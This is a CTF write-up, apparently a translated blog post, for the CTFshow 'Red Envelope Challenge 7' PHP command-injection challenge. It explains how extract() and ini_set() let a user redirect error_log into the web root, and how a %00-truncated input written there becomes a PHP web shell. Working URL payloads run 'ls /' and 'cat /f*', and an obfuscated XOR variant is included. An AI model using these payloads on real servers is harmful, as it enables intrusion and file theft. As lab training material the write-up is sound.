[CTFshow Red Envelope Challenge] Red Envelope Challenge 7 Write up

Language 2023-10-05 18:00:51 views: null

Red Envelope Challenge 7

The source code is as follows

<?php
highlight_file(__FILE__);
error_reporting(2);


extract($_GET);
ini_set($name,$value);


system(
    "ls '".filter($_GET[1])."'"
);

function filter($cmd){
    
    
    $cmd = str_replace("'","",$cmd);
    $cmd = str_replace("\\","",$cmd);
    $cmd = str_replace("`","",$cmd);
    $cmd = str_replace("$","",$cmd);
    return $cmd;
}
  1. error_reporting(2);- This sets the error reporting level to only show warnings. This may be to hide potential error messages from the user.
  2. extract($_GET);- This line $_GETextracts the variables from the array and creates them with the names specified in the array keys. This can lead to potential variable injection vulnerabilities if not sanitized properly.
  3. ini_set($name,$value);- This line attempts $_GETto set a PHP configuration option using a value from an array. $nameThe values ​​for and $valuecome from user input, which could lead to potential security vulnerabilities.
  4. system("ls '".filter($_GET[1])."'");- This line attempts to execute a command on a file or directory ls. Commands are $_GETbuilt using user input in an array. filterFunction used to sanitize user input by removing certain characters such as single quotes, backslashes, accents, and dollar signs. However, this type of sanitization is not very reliable and the possibility of command injection vulnerabilities may still exist.
  5. filterThe function is used to filter the incoming values ​​to see if there are any dangerous characters.

There is also a extract()function here

Definition and usage

The extract() function imports variables from an array into the current symbol table.

This function uses the array key name as the variable name and the array key value as the variable value. For each element in the array, a corresponding variable will be created in the current symbol table.

The second parameter type is used to specify how the extract() function treats such conflicts when a variable already exists and there is an element with the same name in the array.

This function returns the number of variables successfully imported into the symbol table.

To put it simply, it can accept our variables $nameand $valueprocess them

expected solution

You can traverse the directory through the ls command. After searching, you can find the extension directory of the topic php

payload:

http://2fa2962f-a892-42c6-abd2-0a186ea1ab21.challenge.ctf.show/?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731

image-20230814010052319

As you can see, there are 5 extensions in the current environment, including xdebug

When xdebug handles truncation problems, it will payloadecho the exception. And system can just be used 0字节to 截断trigger exceptions, that is%00截断

The idea is to write the echoed content (controllable) to the web directory after triggering the exception. You can write a horse.

Before that, let’s introduce ini_set()the function

PHP ini_set() function

PHP ini_set is used to set the value of php.ini, which takes effect when the function is executed. It is very convenient for virtual space. Here is an introduction to the use of this method.

PHP ini_set is used to set the value of php.ini, which takes effect when the function is executed. After the script ends, the setting becomes invalid. You can modify the configuration without opening the php.ini file, which is very convenient for virtual spaces.

Function format: string ini_set(string $varname, string $newvalue)

In this question, we can use ini_setfunctions to temporarily modify php.inithe PHP configuration in

How to use and configure PHP error_log logging
  1. error_reporting = E_ALL ; Every error that occurs will be reported to PHP
  2. display_errors = Off ;Do not display all error reports that meet the rules defined in the previous command
  3. log_errors = On; Determine the location of log statement recording
  4. log_errors_max_len = 1024; Set the maximum length of each log entry
  5. error_log = "The path where you want to store the log file/php_error.log"; Specify the location of the log file where the generated error report is written.

Since we can pass in the values ​​of $nameand $value, it means that we can control the PHP configuration file error_logand 错误日志its writing file. In addition, xdebug mentioned above will echo the exception payload when dealing with truncation problems. So we can use this to write horses

payload:

?name=error_log&value=/var/www/html/shell.php&1=%00<?php system("ls /");?>

image-20230814011815719

Then visitshell.php

image-20230814012018555

You can see the executed ls /command, change the command to cat /f*, and then access to get the flag

?name=error_log&value=/var/www/html/flag.php&1=%00<?php system("cat /f*");?>

It is recommended not to have lsthe same file name as the file name used to execute the command.

Get flag after access

image-20230814012537452

Other solutions from masters

payload:

/?name=error_log&value=1.php
&1=("%0C%08%00%00"^"`{ %2f");%255C%2527%2527 )?><?php system("cat /*");?>\‘’//\%23

Supongo que te gusta

Origin blog.csdn.net/Leaf_initial/article/details/132268076
Recomendado
Clasificación
Diario
Más
2024-05-17(4)
2024-05-16(22)
2024-05-15(5)
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)
2024-05-09(31)
2024-05-08(18)

Code World

© 2018 codetd.com